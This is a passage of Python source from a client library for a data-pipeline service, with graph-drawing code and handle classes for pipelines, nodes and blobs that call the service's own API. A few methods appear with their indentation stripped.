            node: NodeHandle,
            cur_edges: List[Tuple[Optional[NodeHandle], str, int]],
            ) -> Tuple[List[Tuple[Optional[NodeHandle], str, int]], str]:
        # Continue pass-through edges, then open new edges for *node*'s
        # consumers (sorted so later nodes come first).
        new_edges: List[Tuple[Optional[NodeHandle], str, int]] = []
        segs: List[str] = []
        prev_gap = 0
        for edge in cur_edges:
            cur_node, _, cur_gap = edge
            cur_str = after_pipe if cur_node is not None else ""
            segs.append(f"{space * prev_gap}{cur_str}")
            new_edges.append(edge)
            prev_gap = max(0, cur_gap - len(cur_str))
        sout = sorted(
            outs[node], key=lambda e: order_lookup[e[0]], reverse=True)
        for (in_node, in_key, out_key) in sout:
            cur_str = f"{start_pipe} {out_key} "
            in_state = get_in_state(in_node, in_key)
            end_str = f"{end_pipe} {in_key} ({in_state}) "
            segs.append(f"{space * prev_gap}{cur_str}")
            # Reserve enough width for whichever label is longer.
            cur_gap = max(len(cur_str), len(end_str))
            new_edges.append((in_node, in_key, cur_gap))
            prev_gap = max(0, cur_gap - len(cur_str))
        return new_edges, "".join(segs)

    def draw() -> List[str]:
        # Walk nodes in topological order, emitting for each: incoming
        # edge labels, box top, box line, box bottom, outgoing labels.
        lines: List[str] = []
        edges: List[Tuple[Optional[NodeHandle], str, int]] = []
        for node in order:
            top_gaps = [edge[2] for edge in edges[:-1]]
            top_nodes = [edge[0] for edge in edges]
            same_ids = [edge[0] == node for edge in edges]
            empty_top = [edge[0] is None for edge in edges]
            edges, in_line = draw_in_edges(node, edges)
            in_line = in_line.rstrip()
            if in_line:
                lines.append(f"{indent}{in_line}")
            edges, out_line = draw_out_edges(node, edges)
            bottom_gaps = [edge[2] for edge in edges[:-1]]
            empty_bottom = [edge[0] is None for edge in edges]
            new_bottom = [
                eix >= len(top_nodes) or (
                    edge[0] is not None and top_nodes[eix] != edge[0]
                ) for (eix, edge) in enumerate(edges)
            ]
            # Build the horizontal lead-in to the left of the node box.
            line_indents: List[str] = []
            started = False
            had_same = False
            highest_iix = -1
            for (iix, top_gap) in enumerate(top_gaps):
                if same_ids[iix]:
                    had_same = True
                if had_same and iix >= len(bottom_gaps):
                    break
                if not line_indents:
                    line_indents.append(indent)
                if empty_top[iix]:
                    cur_connect = cont_skip if started else space
                elif iix >= len(empty_bottom) or empty_bottom[iix]:
                    if started:
                        cur_connect = cont_left
                    else:
                        cur_connect = start_left
                        if len(bottom_gaps) < len(top_gaps):
                            break
                    started = True
                else:
                    if started:
                        cur_connect = cont_skip
                    else:
                        cur_connect = cont_pipe
                cur_line = cont_skip if started else space
                gap_size = top_gap - len(cur_connect)
                line_indents.append(f"{cur_connect}{cur_line * gap_size}")
                highest_iix = iix
            if line_indents:
                line_indents[-1] = line_indents[-1][:-len(indent)]
            # The node box's visible label.
            if nodes_only:
                mid = f" {node.get_short_status(allow_unicode)} "
            else:
                mid = \
                    f"{node.get_short_status(allow_unicode)} " \
                    f"{node.get_name()}({node.get_type()}) " \
                    f"{node.get_highest_chunk()}"
            if len(mid) < prefix_len:
                mid = f"{mid}{space * (prefix_len - len(mid))}"
            content = f"{vend if started else vsec}{mid}{vsec}"
            node_line = f"{''.join(line_indents)}{content}"
            # Vertical continuation columns above and below the box.
            top_indents: List[str] = []
            bottom_indents: List[str] = []
            for iix in range(highest_iix + 1):
                top_connect = space if empty_top[iix] else cont_pipe
                has_bottom = iix >= len(empty_bottom) or empty_bottom[iix]
                bottom_connect = space if has_bottom else cont_pipe
                top_gap_size = top_gaps[iix] - len(top_connect)
                bottom_gap_size = top_gaps[iix] - len(bottom_connect)
                if not top_indents:
                    top_indents.append(indent)
                top_indents.append(f"{top_connect}{space * top_gap_size}")
                if not bottom_indents:
                    bottom_indents.append(indent)
                bottom_indents.append(
                    f"{bottom_connect}{space * bottom_gap_size}")
            if top_indents:
                top_indents[-1] = top_indents[-1][:-len(indent)]
            if bottom_indents:
                bottom_indents[-1] = bottom_indents[-1][:-len(indent)]
            # Top and bottom box borders with edge connectors punched in.
            border_len = len(content) - len(tl) - len(tr)
            top_border: List[str] = [tl] + [hsec] * border_len + [tr]
            top_ix = len(indent)
            for iix in range(highest_iix + 1, len(same_ids)):
                if top_ix >= len(top_border):
                    break
                if same_ids[iix]:
                    top_border[top_ix] = conn_top
                if iix >= len(top_gaps):
                    break
                top_ix += top_gaps[iix]
            bottom_border: List[str] = [bl] + [hsec] * border_len + [br]
            bottom_ix = len(indent)
            for iix in range(highest_iix + 1, len(new_bottom)):
                if bottom_ix >= len(bottom_border):
                    break
                if new_bottom[iix]:
                    bottom_border[bottom_ix] = conn_bottom
                if iix >= len(bottom_gaps):
                    break
                bottom_ix += bottom_gaps[iix]
            node_top = f"{''.join(top_indents)}{''.join(top_border)}"
            node_bottom = \
                f"{''.join(bottom_indents)}{''.join(bottom_border)}"
            # Extend a horizontal bar to the right when edges pass the box.
            total_gap_top = sum(top_gaps) - len(node_line)
            total_gap_bottom = sum(bottom_gaps) - len(node_line)
            if total_gap_bottom > total_gap_top:
                connector = corner_right
                more_gaps = bottom_gaps
                top_conn = space
                bottom_conn = cont_pipe
            else:
                connector = corner_left
                more_gaps = top_gaps
                top_conn = cont_pipe
                bottom_conn = space
            if total_gap_bottom == total_gap_top:
                connector = pipe
                more_gaps = bottom_gaps
                top_conn = cont_pipe
                bottom_conn = cont_pipe
            total_gap = max(total_gap_bottom, total_gap_top)
            if total_gap >= -prefix_len:
                bar_len = total_gap + prefix_len
                full_bar = list(bar * bar_len)
                full_top = list(space * bar_len)
                full_bottom = list(space * bar_len)
                bar_ix = prefix_len - len(node_line)
                for (before_gap_ix, bar_gap) in enumerate(more_gaps):
                    bar_ix += bar_gap
                    if bar_ix < 0:
                        continue
                    if bar_ix >= len(full_bar):
                        break
                    gap_ix = before_gap_ix + 1
                    if gap_ix < len(same_ids) and not same_ids[gap_ix]:
                        mid_connector = cont_skip
                        mid_top = cont_pipe
                        mid_bottom = cont_pipe
                    else:
                        mid_connector = cont
                        mid_top = cont_pipe
                        mid_bottom = cont_pipe
                    adj_ix = bar_ix - prefix_len
                    if total_gap_bottom >= adj_ix > total_gap_top:
                        mid_connector = cont_right
                        mid_top = space
                    elif total_gap_bottom < adj_ix <= total_gap_top:
                        if not empty_top[gap_ix]:
                            mid_connector = cont_left
                        else:
                            mid_top = space
                        mid_bottom = space
                    full_bar[bar_ix] = mid_connector
                    full_top[bar_ix] = mid_top
                    full_bottom[bar_ix] = mid_bottom
                node_line = \
                    f"{node_line[:-len(vsec)]}{vstart}" \
                    f"{''.join(full_bar)}{connector}"
                node_top = f"{node_top}{''.join(full_top)}{top_conn}"
                node_bottom = \
                    f"{node_bottom}{''.join(full_bottom)}{bottom_conn}"
            lines.append(node_top.rstrip())
            lines.append(node_line)
            lines.append(node_bottom.rstrip())
            out_line = out_line.rstrip()
            if out_line:
                lines.append(f"{indent}{out_line}")
        return lines

    return "\n".join(draw())
def get_def(
self,
full: bool = True,
warnings_io: Optional[IO[Any]] = sys.stderr) -> PipelineDef:
res = cast(PipelineDef, self._client._request_json(
METHOD_GET, "/pipeline_def", {
"pipeline": self.get_id(),
"full": 1 if full else 0,
}))
# look for warnings
def s3_warnings(
kind: str,
settings: Dict[str, Dict[str, Any]],
warnings: List[str]) -> None:
s3_settings = settings.get(kind, {})
for (key, s3_setting) in s3_settings.items():
warnings.extend((
f"{kind}:{key}: {warn}"
for warn in s3_setting.get("warnings", [])
))
if warnings_io is not None:
settings = res.get("settings", {})
warnings: List[str] = []
s3_warnings("s3", settings, warnings)
s3_warnings("triton", settings, warnings)
if len(warnings) > 1:
warnings_io.write(
f"{len(warnings)} warnings while "
f"reconstructing settings:\n")
elif len(warnings) == 1:
warnings_io.write(
"Warning while reconstructing settings:\n")
for warn in warnings:
warnings_io.write(f"{warn}\n")
if warnings:
warnings_io.flush()
return res
    def set_attr(
            self,
            attr: str,
            value: Any) -> None:
        """Overwrite one top-level key of the pipeline definition.

        Fetches the full definition, replaces the key, and writes the
        whole definition back via the client.
        """
        pipe_def = self.get_def()
        pipe_def[attr] = value  # type: ignore
        self._client.set_pipeline(self.get_id(), pipe_def)

    def set_name(self, value: str) -> None:
        """Rename the pipeline."""
        self.set_attr("name", value)

    def set_company(self, value: str) -> None:
        """Set the owning company of the pipeline."""
        self.set_attr("company", value)

    def set_state(self, value: str) -> None:
        """Set the pipeline state."""
        self.set_attr("state", value)

    def set_high_priority(self, value: bool) -> None:
        """Toggle high-priority scheduling for the pipeline."""
        self.set_attr("high_priority", value)

    def set_queue_mng(self, value: Optional[str]) -> None:
        """Set the queue manager; None clears it."""
        self.set_attr("queue_mng", value)
    def get_visible_blobs(self) -> List[str]:
        """Return the ids of all blobs visible to this pipeline."""
        return [
            res[0]
            for res in self.get_visible_blob_times(retrieve_times=False)[1]
        ]

    def get_visible_blob_ages(self) -> List[Tuple[str, str]]:
        """Return (blob id, human-readable age) pairs.

        Sorted by blob time (None-safe via safe_opt_num), then by id.
        """
        cur_time, visible = self.get_visible_blob_times(retrieve_times=True)
        return [
            (blob_id, get_age(cur_time, blob_time))
            for (blob_id, blob_time) in sorted(visible, key=lambda el: (
                safe_opt_num(el[1]), el[0]))
        ]

    def get_visible_blob_times(self, retrieve_times: bool) -> Tuple[
            float, List[Tuple[str, Optional[float]]]]:
        """Return the server's current time and (blob id, time) pairs.

        NOTE(review): blob times are presumably None when
        retrieve_times is False -- confirm against the server API.
        """
        res = cast(VisibleBlobs, self._client._request_json(
            METHOD_GET, "/visible_blobs", {
                "pipeline": self.get_id(),
                "retrieve_times": int(retrieve_times),
            }))
        return res["cur_time"], res["visible"]
    @overload
    def check_queue_stats(  # pylint: disable=no-self-use
            self, minimal: Literal[True]) -> MinimalQueueStatsResponse:
        ...

    @overload
    def check_queue_stats(  # pylint: disable=no-self-use
            self, minimal: Literal[False]) -> QueueStatsResponse:
        ...

    @overload
    def check_queue_stats(  # pylint: disable=no-self-use
            self,
            minimal: bool) -> Union[
                MinimalQueueStatsResponse, QueueStatsResponse]:
        ...

    def check_queue_stats(self, minimal: bool) -> Union[
            MinimalQueueStatsResponse, QueueStatsResponse]:
        """Query queue statistics scoped to this pipeline.

        The overloads above narrow the return type by ``minimal``.
        """
        pipe_id: Optional[str] = self.get_id()
        return self._client.check_queue_stats(pipe_id, minimal=minimal)
    def scale_worker(self, replicas: int) -> bool:
        """Request a worker replica count; True when the server accepted."""
        return cast(WorkerScale, self._client._request_json(
            METHOD_PUT, "/worker", {
                "pipeline": self.get_id(),
                "replicas": replicas,
                "task": None,
            }))["success"]

    def reload(self, timestamp: Optional[float] = None) -> float:
        """Trigger a pipeline reload; returns the server's reload time."""
        return cast(PipelineReload, self._client._request_json(
            METHOD_PUT, "/pipeline_reload", {
                "pipeline": self.get_id(),
                "timestamp": timestamp,
            }))["when"]

    def set_kafka_topic_partitions(
            self,
            num_partitions: int,
            large_input_retention: bool = False) -> KafkaTopics:
        """Configure the kafka partition count for this pipeline's topics."""
        return cast(KafkaTopics, self._client._request_json(
            METHOD_POST, "/kafka_topics", {
                "pipeline": self.get_id(),
                "num_partitions": num_partitions,
                "large_input_retention": large_input_retention,
            }))
def post_kafka_objs(self, input_objs: List[Any]) -> List[str]:
bios = [
BytesIO(json.dumps(
input_obj,
separators=(",", ":"),
indent=None,
sort_keys=True).encode("utf-8"))
for input_obj in input_objs
]
return self.post_kafka_msgs(bios)
def post_kafka_msgs(self, input_data: List[BytesIO]) -> List[str]:
names = [f"file{pos}" for pos in range(len(input_data))]
res = cast(KafkaMessage, self._client._request_json(
METHOD_FILE, "/kafka_msg", {
"pipeline": self._pipe_id,
}, files=dict(zip(names, input_data))))
msgs = res["messages"]
return [msgs[key] for key in names]
    def read_kafka_output(
            self,
            offset: str = "current",
            max_rows: int = 100) -> Optional[ByteResponse]:
        """Read up to `max_rows` results from the kafka output stream.

        The given offset is used only for the first read; every
        subsequent read continues from "current". Results are merged
        into a single response; None when nothing could be read.
        """
        # single-element list so the closure can rewrite the offset
        # after the first request
        offset_str = [offset]

        def read_single() -> Tuple[ByteResponse, str]:
            cur, read_ctype = self._client.request_bytes(
                METHOD_GET, "/kafka_msg", {
                    "pipeline": self.get_id(),
                    "offset": offset_str[0],
                })
            offset_str[0] = "current"
            return interpret_ctype(cur, read_ctype), read_ctype

        if max_rows <= 1:
            return read_single()[0]
        res: List[ByteResponse] = []
        ctype: Optional[str] = None
        while True:
            val, cur_ctype = read_single()
            if val is None:
                break
            if ctype is None:
                ctype = cur_ctype
            elif ctype != cur_ctype:
                # refuse to merge payloads of differing content types
                raise ValueError(
                    f"inconsistent return types {ctype} != {cur_ctype}")
            res.append(val)
            if len(res) >= max_rows:
                break
        if not res or ctype is None:
            return None
        return merge_ctype(res, ctype)
    def get_kafka_offsets(self, alive: bool) -> KafkaOffsets:
        """Return the current kafka topic offsets for this pipeline.

        `alive` is forwarded as an int flag; presumably it restricts the
        query to live consumers -- confirm against the server API.
        """
        return cast(KafkaOffsets, self._client._request_json(
            METHOD_GET, "/kafka_offsets", {
                "pipeline": self._pipe_id,
                "alive": int(alive),
            }))
    def get_kafka_throughput(
            self,
            segment_interval: float = 120.0,
            segments: int = 5) -> KafkaThroughput:
        """Measure input/output throughput of the pipeline's kafka topics.

        Samples the topic offsets `segments + 1` times, waiting
        `segment_interval` seconds between samples, and computes
        per-second rates. Blocks for roughly
        `segments * segment_interval` seconds.
        """
        assert segments > 0
        assert segment_interval > 0.0
        offsets = self.get_kafka_offsets(alive=False)
        now = time.monotonic()
        # each measurement: (input offset, output offset, error offset, time)
        measurements: List[Tuple[int, int, int, float]] = [(
            offsets["input"],
            offsets["output"],
            offsets["error"],
            now,
        )]
        for _ in range(segments):
            prev = now
            # sleep until a full segment_interval has elapsed; the loop
            # guards against time.sleep waking early
            while now - prev < segment_interval:
                time.sleep(max(0.0, segment_interval - (now - prev)))
                now = time.monotonic()
            offsets = self.get_kafka_offsets(alive=False)
            measurements.append((
                offsets["input"],
                offsets["output"],
                offsets["error"],
                now,
            ))
        first = measurements[0]
        last = measurements[-1]
        total_input = last[0] - first[0]
        total_output = last[1] - first[1]
        errors = last[2] - first[2]
        total = last[3] - first[3]
        # per-segment rates for min/max/stddev statistics
        input_segments: List[float] = []
        output_segments: List[float] = []
        cur_input = first[0]
        cur_output = first[1]
        cur_time = first[3]
        for (next_input, next_output, _, next_time) in measurements[1:]:
            seg_time = next_time - cur_time
            input_segments.append((next_input - cur_input) / seg_time)
            output_segments.append((next_output - cur_output) / seg_time)
            cur_input = next_input
            cur_output = next_output
            cur_time = next_time
        inputs = pd.Series(input_segments)
        outputs = pd.Series(output_segments)
        return {
            "pipeline": self._pipe_id,
            "input": {
                "throughput": total_input / total,
                "max": inputs.max(),
                "min": inputs.min(),
                "stddev": inputs.std(),
                "segments": segments,
                "count": total_input,
                "total": total,
            },
            "output": {
                "throughput": total_output / total,
                "max": outputs.max(),
                "min": outputs.min(),
                "stddev": outputs.std(),
                "segments": segments,
                "count": total_output,
                "total": total,
            },
            "faster": "both" if total_input == total_output else (
                "input" if total_input > total_output else "output"),
            "errors": errors,
        }
    def get_kafka_group(self) -> KafkaGroup:
        """Return the kafka consumer group info of this pipeline."""
        return cast(KafkaGroup, self._client._request_json(
            METHOD_GET, "/kafka_group", {
                "pipeline": self._pipe_id,
            }))

    def set_kafka_group(
            self,
            group_id: Optional[str] = None,
            reset: Optional[str] = None,
            warnings_io: Optional[IO[Any]] = sys.stderr,
            **kwargs: Any) -> KafkaGroup:
        """Update the kafka consumer group of this pipeline.

        NOTE(review): extra kwargs trigger a "will get ignored" warning
        yet are still forwarded in the request payload -- confirm
        whether they should be dropped instead.
        """
        if kwargs and warnings_io is not None:
            warnings_io.write(
                f"WARNING: the provided kwargs {kwargs} will "
                "get ignored on the server side.")
            warnings_io.flush()
        return cast(KafkaGroup, self._client._request_json(
            METHOD_PUT, "/kafka_group", {
                "pipeline": self._pipe_id,
                "group_id": group_id,
                "reset": reset,
                **kwargs,
            }))
    def __hash__(self) -> int:
        # a handle's identity is its pipeline id
        return hash(self._pipe_id)

    def __eq__(self, other: object) -> bool:
        # equality requires the exact same class, not just any handle
        if not isinstance(other, self.__class__):
            return False
        return self.get_id() == other.get_id()

    def __ne__(self, other: object) -> bool:
        return not self.__eq__(other)

    def __str__(self) -> str:
        return self._pipe_id

    def __repr__(self) -> str:
        return f"{self.__class__.__name__}[{self._pipe_id}]"
# *** PipelineHandle ***
class NodeHandle:
    """Handle for a single node of a pipeline.

    Caches node metadata (name, type, blobs, inputs, state) which is
    refreshed via update_info. All server interaction goes through the
    shared client.
    """
    def __init__(
            self,
            client: XYMEClientV3,
            pipeline: PipelineHandle,
            node_id: str,
            node_name: str,
            kind: str) -> None:
        self._client = client
        self._pipeline = pipeline
        self._node_id = node_id
        self._node_name = node_name
        self._type = kind
        self._blobs: Dict[str, BlobHandle] = {}
        self._inputs: Dict[str, Tuple[str, str]] = {}
        self._state: Optional[int] = None
        self._config_error: Optional[str] = None

    @staticmethod
    def from_node_info(
            client: XYMEClientV3,
            pipeline: PipelineHandle,
            node_info: NodeInfo,
            prev: Optional['NodeHandle']) -> 'NodeHandle':
        """Build a handle from node info, reusing `prev` when given."""
        if prev is None:
            res = NodeHandle(
                client,
                pipeline,
                node_info["id"],
                node_info["name"],
                node_info["type"])
        else:
            if prev.get_pipeline() != pipeline:
                raise ValueError(f"{prev.get_pipeline()} != {pipeline}")
            res = prev
        res.update_info(node_info)
        return res

    def update_info(self, node_info: NodeInfo) -> None:
        """Refresh cached metadata from a node info payload."""
        if self._node_id != node_info["id"]:
            raise ValueError(f"{self._node_id} != {node_info['id']}")
        self._node_name = node_info["name"]
        self._type = node_info["type"]
        self._blobs = {
            key: BlobHandle(
                self._client,
                value,
                is_full=False,
                pipeline=self.get_pipeline())
            for (key, value) in node_info["blobs"].items()
        }
        self._inputs = node_info["inputs"]
        self._state = node_info["state"]
        self._config_error = node_info["config_error"]

    def get_pipeline(self) -> PipelineHandle:
        """Return the owning pipeline handle."""
        return self._pipeline

    def get_id(self) -> str:
        """Return the node id."""
        return self._node_id

    def get_name(self) -> str:
        """Return the node name (as last cached)."""
        return self._node_name

    def get_type(self) -> str:
        """Return the node type (as last cached)."""
        return self._type

    def get_node_def(self) -> NodeDefInfo:
        """Return the node definition info for this node's type."""
        return self._client.get_node_defs()[self.get_type()]

    def get_inputs(self) -> Set[str]:
        """Return the input keys of the node."""
        return set(self._inputs.keys())

    def get_input(self, key: str) -> Tuple['NodeHandle', str]:
        """Return the (node, output key) pair feeding the given input."""
        node_id, out_key = self._inputs[key]
        return self.get_pipeline().get_node(node_id), out_key

    def get_status(self) -> TaskStatus:
        """Query the current task status of the node."""
        return cast(NodeStatus, self._client._request_json(
            METHOD_GET, "/node_status", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
            }))["status"]

    def has_config_error(self) -> bool:
        """Whether a configuration error was reported for the node."""
        return self._config_error is not None

    def get_config_error(self) -> Optional[str]:
        """Return the configuration error message, if any."""
        return self._config_error

    def get_blobs(self) -> List[str]:
        """Return the sorted blob keys of the node."""
        return sorted(self._blobs.keys())

    def get_blob_handles(self) -> Dict[str, 'BlobHandle']:
        """Return the mapping from blob key to blob handle."""
        return self._blobs

    def get_blob_handle(self, key: str) -> 'BlobHandle':
        """Return the blob handle for the given blob key."""
        return self._blobs[key]

    def set_blob_uri(self, key: str, blob_uri: str) -> str:
        """Point a blob key at a new uri; returns the stored uri."""
        return cast(PutNodeBlob, self._client._request_json(
            METHOD_PUT, "/node_blob", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
                "blob_key": key,
                "blob_uri": blob_uri,
            }))["new_uri"]

    def get_in_cursor_states(self) -> Dict[str, int]:
        """Return the input cursor positions of the node."""
        return cast(InCursors, self._client._request_json(
            METHOD_GET, "/node_in_cursors", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
            }))["cursors"]

    def get_highest_chunk(self) -> int:
        """Return the highest chunk number available for the node."""
        return cast(NodeChunk, self._client._request_json(
            METHOD_GET, "/node_chunk", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
            }))["chunk"]

    def get_short_status(self, allow_unicode: bool = True) -> str:
        """Return a one-character representation of the node status."""
        status_map: Dict[TaskStatus, str] = {
            "blocked": "B",
            "waiting": "W",
            "running": "→" if allow_unicode else "R",
            "complete": "✓" if allow_unicode else "C",
            "eos": "X",
            "paused": "P",
            "error": "!",
            "unknown": "?",
            "virtual": "∴" if allow_unicode else "V",
            "queue": "=",
        }
        return status_map[self.get_status()]

    def get_logs(self) -> str:
        """Fetch and return the full log output of the node."""
        with self._client._raw_request_str(
                METHOD_GET, "/node_logs", {
                    "pipeline": self.get_pipeline().get_id(),
                    "node": self.get_id(),
                }) as fin:
            return fin.read()

    def get_timing(self) -> List[Timing]:
        """Return performance timing entries for the node."""
        return cast(Timings, self._client._request_json(
            METHOD_GET, "/node_perf", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
            }))["times"]

    def read_blob(
            self,
            key: str,
            chunk: Optional[int],
            force_refresh: bool) -> 'BlobHandle':
        """Trigger a blocking read of an output and return its blob."""
        res = cast(ReadNode, self._client._request_json(
            METHOD_LONGPOST, "/read_node", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
                "key": key,
                "chunk": chunk,
                "is_blocking": True,
                "force_refresh": force_refresh,
            }))
        uri = res["result_uri"]
        if uri is None:
            raise ValueError(f"uri is None: {res}")
        return BlobHandle(
            self._client,
            uri,
            is_full=True,
            pipeline=self.get_pipeline())

    def read(
            self,
            key: str,
            chunk: Optional[int],
            force_refresh: bool = False) -> Optional[ByteResponse]:
        """Read one chunk of an output and return its content."""
        return self.read_blob(key, chunk, force_refresh).get_content()

    def read_all(
            self,
            key: str,
            force_refresh: bool = False) -> Optional[ByteResponse]:
        """Read all chunks of an output and merge them.

        The initial chunk=None read triggers computation; afterwards
        chunks are read sequentially until one is empty.
        """
        self.read(key, chunk=None, force_refresh=force_refresh)
        res: List[ByteResponse] = []
        ctype: Optional[str] = None
        while True:
            blob = self.read_blob(key, chunk=len(res), force_refresh=False)
            cur = blob.get_content()
            if cur is None:
                break
            cur_ctype = blob.get_ctype()
            if ctype is None:
                ctype = cur_ctype
            elif ctype != cur_ctype:
                # refuse to merge chunks of differing content types
                raise ValueError(
                    f"inconsistent return types {ctype} != {cur_ctype}")
            res.append(cur)
        if not res or ctype is None:
            return None
        return merge_ctype(res, ctype)

    def clear(self) -> NodeState:
        """Reset the node state."""
        return cast(NodeState, self._client._request_json(
            METHOD_PUT, "/node_state", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
                "action": "reset",
            }))

    def requeue(self) -> NodeState:
        """Requeue the node for execution."""
        return cast(NodeState, self._client._request_json(
            METHOD_PUT, "/node_state", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
                "action": "requeue",
            }))

    def fix_error(self) -> NodeState:
        """Clear the error state of the node."""
        return cast(NodeState, self._client._request_json(
            METHOD_PUT, "/node_state", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
                "action": "fix_error",
            }))

    def get_csv_blob(self) -> 'CSVBlobHandle':
        """Return the csv blob handle of a csv_reader node."""
        if self.get_type() != "csv_reader":
            raise ValueError("node doesn't have csv blob")
        res = cast(CSVBlobResponse, self._client._request_json(
            METHOD_GET, "/csv_blob", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
            }))
        return CSVBlobHandle(
            self._client,
            self.get_pipeline(),
            res["csv"],
            res["count"],
            res["pos"],
            res["tmp"])

    def get_json_blob(self) -> 'JSONBlobHandle':
        """Return the json blob handle of a jsons_reader node."""
        if self.get_type() != "jsons_reader":
            raise ValueError(
                f"can not append jsons to {self}, expected 'jsons_reader'")
        res = cast(JSONBlobResponse, self._client._request_json(
            METHOD_GET, "/json_blob", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
            }))
        return JSONBlobHandle(
            self._client,
            self.get_pipeline(),
            res["json"],
            res["count"])

    def check_custom_code_node(self) -> None:
        """Raise unless this node is a custom code node."""
        if self.get_type() not in CUSTOM_NODE_TYPES:
            raise ValueError(f"{self} is not a custom code node.")

    def set_custom_imports(
            self, modules: List[List[str]]) -> CustomImportsResponse:
        """Set the import list available to the node's custom code."""
        self.check_custom_code_node()
        return cast(CustomImportsResponse, self._client._request_json(
            METHOD_PUT, "/custom_imports", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
                "modules": modules,
            }))

    def get_custom_imports(self) -> CustomImportsResponse:
        """Return the import list available to the node's custom code."""
        self.check_custom_code_node()
        return cast(CustomImportsResponse, self._client._request_json(
            METHOD_GET, "/custom_imports", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
            }))

    def set_es_query(self, query: Dict[str, Any]) -> ESQueryResponse:
        """Set the elasticsearch query of an es_reader node."""
        if self.get_type() != "es_reader":
            raise ValueError(f"{self} is not a es reader node")
        return cast(ESQueryResponse, self._client._request_json(
            METHOD_POST, "/es_query", {
                "pipeline": self.get_pipeline().get_id(),
                "blob": self.get_blob_handle("es").get_uri(),
                "es_query": query,
            },
        ))

    def get_es_query(self) -> ESQueryResponse:
        """Return the elasticsearch query of an es_reader node."""
        if self.get_type() != "es_reader":
            raise ValueError(f"{self} is not a es reader node")
        return cast(ESQueryResponse, self._client._request_json(
            METHOD_GET, "/es_query", {
                "pipeline": self.get_pipeline().get_id(),
                "blob": self.get_blob_handle("es").get_uri(),
            },
        ))

    def set_custom_code(self, func: FUNC) -> CustomCodeResponse:
        """Upload a python function as the node's custom code.

        The function source is extended with an invocation stub and
        validated with a restricted compile before upload.
        """
        from RestrictedPython import compile_restricted

        self.check_custom_code_node()

        def fn_as_str(fun: FUNC) -> str:
            # append the call stub; dedent aligns the generated lines
            body = textwrap.dedent(inspect.getsource(fun))
            res = body + textwrap.dedent(f"""
                result = {fun.__name__}(*data)
                if result is None:
                    raise ValueError("{fun.__name__} must return a value")
            """)
            compile_restricted(res, "inline", "exec")
            return res

        raw_code = fn_as_str(func)
        return cast(CustomCodeResponse, self._client._request_json(
            METHOD_PUT, "/custom_code", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
                "code": raw_code,
            }))

    def get_custom_code(self) -> CustomCodeResponse:
        """Return the node's custom code."""
        self.check_custom_code_node()
        return cast(CustomCodeResponse, self._client._request_json(
            METHOD_GET, "/custom_code", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
            }))

    def get_user_columns(self, key: str) -> UserColumnsResponse:
        """Return the user columns of the given output key."""
        return cast(UserColumnsResponse, self._client._request_json(
            METHOD_GET, "/user_columns", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
                "key": key,
            }))

    def get_input_example(self) -> Dict[str, Optional[ByteResponse]]:
        """Load the first chunk of each input, reduced to user columns."""
        if self.get_type() != "custom_data":
            raise ValueError(
                "can only load example input data for 'custom' node")
        res = {}
        for key in self.get_inputs():
            input_node, out_key = self.get_input(key)
            df = input_node.read(out_key, 0)
            if df is not None and isinstance(df, pd.DataFrame):
                user_columns = \
                    input_node.get_user_columns(out_key)["user_columns"]
                # strip the "user_" prefix from the exposed column names
                rmap = {col: col.replace("user_", "") for col in user_columns}
                df = df.loc[:, user_columns].rename(columns=rmap)
            res[key] = df
        return res

    def setup_model(self, obj: Dict[str, Any]) -> Any:
        """Configure the model of a model node."""
        if self.get_type() not in MODEL_NODE_TYPES:
            raise ValueError(f"{self} is not a model node")
        model_type: str
        if self.get_type() in EMBEDDING_MODEL_NODE_TYPES:
            model_type = "embedding"
        else:
            # FIX: previously model_type was left unbound here which
            # crashed with UnboundLocalError below -- fail explicitly
            raise ValueError(
                f"unsupported model type for {self}: {self.get_type()}")
        return cast(ModelSetupResponse, self._client._request_json(
            METHOD_PUT, "/model_setup", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
                "config": obj,
                "model_type": model_type,
            }))

    def get_model_params(self) -> Any:
        """Return the model parameters of the node."""
        return cast(ModelParamsResponse, self._client._request_json(
            METHOD_GET, "/model_params", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
            }))

    def get_def(self) -> NodeDef:
        """Return the full node definition."""
        return cast(NodeDef, self._client._request_json(
            METHOD_GET, "/node_def", {
                "pipeline": self.get_pipeline().get_id(),
                "node": self.get_id(),
            }))

    def __hash__(self) -> int:
        return hash(self._node_id)

    def __eq__(self, other: object) -> bool:
        if not isinstance(other, self.__class__):
            return False
        return self.get_id() == other.get_id()

    def __ne__(self, other: object) -> bool:
        return not self.__eq__(other)

    def __str__(self) -> str:
        return self._node_id

    def __repr__(self) -> str:
        return f"{self.__class__.__name__}[{self._node_id}]"
# *** NodeHandle ***
# uri scheme prefix that marks a blob holding no data
EMPTY_BLOB_PREFIX = "null://"
class BlobHandle:
    """Handle for a blob uri.

    A handle is either "full" (points at concrete result data that can
    be downloaded) or not full (points at a blob location used for
    ownership, copying, and zip transfer operations).
    """
    def __init__(
            self,
            client: XYMEClientV3,
            uri: str,
            is_full: bool,
            pipeline: PipelineHandle) -> None:
        self._client = client
        self._uri = uri
        self._is_full = is_full
        self._pipeline = pipeline
        # content type of the last downloaded content
        self._ctype: Optional[str] = None

    def is_full(self) -> bool:
        """Whether this handle points at downloadable result data."""
        return self._is_full

    def is_empty(self) -> bool:
        """Whether the uri marks an empty (null) blob."""
        return self._uri.startswith(EMPTY_BLOB_PREFIX)

    def get_uri(self) -> str:
        """Return the blob uri."""
        return self._uri

    def get_pipeline(self) -> PipelineHandle:
